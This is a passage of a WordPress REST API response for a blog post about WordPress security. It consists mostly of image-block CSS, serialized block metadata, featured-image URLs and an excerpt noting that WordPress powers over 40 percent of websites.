figcaption{text-align:center;margin-top:.5em;margin-bottom:1em}.wp-block-uagb-image .components-placeholder.block-editor-media-placeholder .components-placeholder__instructions{align-self:center}.wp-block-uagb-image--align-left{text-align:left}.wp-block-uagb-image--align-right{text-align:right}.wp-block-uagb-image--align-center{text-align:center}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure{margin-left:calc(50% - 50vw);margin-right:calc(50% - 50vw);max-width:100vw;width:100vw;height:auto}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure img{height:auto;width:100% !important}.wp-block-uagb-image--align-wide .wp-block-uagb-image__figure 
img{height:auto;width:100%}.wp-block-uagb-image--layout-overlay__color-wrapper{position:absolute;left:0;top:0;right:0;bottom:0;opacity:.2;background:rgba(0,0,0,.5);transition:opacity .35s ease-in-out}.wp-block-uagb-image--layout-overlay-link{position:absolute;left:0;right:0;bottom:0;top:0}.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity:1}.wp-block-uagb-image--layout-overlay__inner{position:absolute;left:15px;right:15px;bottom:15px;top:15px;display:flex;align-items:center;justify-content:center;flex-direction:column;border-color:#fff;transition:.35s ease-in-out}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.top-center,.wp-block-uagb-image--layout-overlay__inner.top-right{justify-content:flex-start}.wp-block-uagb-image--layout-overlay__inner.bottom-left,.wp-block-uagb-image--layout-overlay__inner.bottom-center,.wp-block-uagb-image--layout-overlay__inner.bottom-right{justify-content:flex-end}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.center-left,.wp-block-uagb-image--layout-overlay__inner.bottom-left{align-items:flex-start}.wp-block-uagb-image--layout-overlay__inner.top-right,.wp-block-uagb-image--layout-overlay__inner.center-right,.wp-block-uagb-image--layout-overlay__inner.bottom-right{align-items:flex-end}.wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{color:#fff;transition:transform .35s,opacity .35s ease-in-out;transform:translate3d(0, 24px, 0);margin:0;line-height:1em}.wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width:30%;border-top-width:2px;border-top-color:#fff;border-top-style:solid;margin-bottom:10px;opacity:0;transition:transform .4s,opacity .4s ease-in-out;transform:translate3d(0, 30px, 0)}.wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity:0;overflow:visible;color:#fff;transition:transform .45s,opacity .45s 
ease-in-out;transform:translate3d(0, 35px, 0)}.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-heading,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-separator,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-caption{opacity:1;transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1.05)}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{width:calc(100% + 40px) !important;max-width:none !important;transform:translate3d(-40px, 0, 0);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-grayscale img{filter:grayscale(0%);transition:.35s ease-in-out}.wp-block-uagb-image--effect-grayscale:hover img{filter:grayscale(100%)}.wp-block-uagb-image--effect-blur img{filter:blur(0);transition:.35s ease-in-out}.wp-block-uagb-image--effect-blur:hover img{filter:blur(3px)}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure figcaption{font-style: normal;align-self: center;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay 
.wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 0.2;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner{left: 15px;right: 15px;top: 15px;bottom: 15px;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{font-style: normal;color: #fff;opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading a{color: #fff;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width: 30%;border-top-width: 2px;border-top-color: #fff;opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure:hover img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure:hover img{box-shadow: 0px 0px 0 #00000070;}@media only screen and (max-width: 976px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}@media only screen and (max-width: 767px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: 
auto;}}\";s:2:\"js\";s:0:\"\";s:18:\"current_block_list\";a:18:{i:0;s:14:\"core\/paragraph\";i:1;s:12:\"core\/heading\";i:2;s:9:\"core\/html\";i:3;s:9:\"core\/list\";i:4;s:14:\"core\/list-item\";i:5;s:21:\"uagb\/advanced-heading\";i:6;s:11:\"core\/search\";i:7;s:10:\"core\/group\";i:8;s:17:\"core\/latest-posts\";i:9;s:20:\"core\/latest-comments\";i:10;s:13:\"core\/archives\";i:11;s:15:\"core\/categories\";i:12;s:10:\"uagb\/image\";i:13;s:11:\"core\/spacer\";i:14;s:30:\"woocommerce\/product-categories\";i:15;s:18:\"core\/legacy-widget\";i:16;s:10:\"core\/image\";i:17;s:14:\"core\/shortcode\";}s:8:\"uag_flag\";b:1;s:11:\"uag_version\";s:10:\"1778451638\";s:6:\"gfonts\";a:0:{}s:10:\"gfonts_url\";s:0:\"\";s:12:\"gfonts_files\";a:0:{}s:14:\"uag_faq_layout\";b:0;}"]},"uagb_featured_image_src":{"full":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"thumbnail":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-150x150.jpg",150,150,true],"medium":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-300x150.jpg",300,150,true],"medium_large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-768x384.jpg",768,384,true],"large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1024x512.jpg",1024,512,true],"1536x1536":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1536x768.jpg",1536,768,true],"2048x2048":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"trp-custom-language-flag":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-18x9.jpg",18,9,true]},"uagb_author_info":{"display_name":"admin","author_link":"https:\/\/www.ferberenterprises.com\/cz\/author\/admin2721\/"},"uagb_comment_info":0,"uagb_excerpt":"WordPress remains the most widely used content 
management system in the world, powering more than 40 percent of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem,&hellip;","_links":{"self":[{"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/posts\/24971","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/comments?post=24971"}],"version-history":[{"count":20,"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/posts\/24971\/revisions"}],"predecessor-version":[{"id":25042,"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/posts\/24971\/revisions\/25042"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/media\/24973"}],"wp:attachment":[{"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/media?parent=24971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/categories?post=24971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/tags?post=24971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}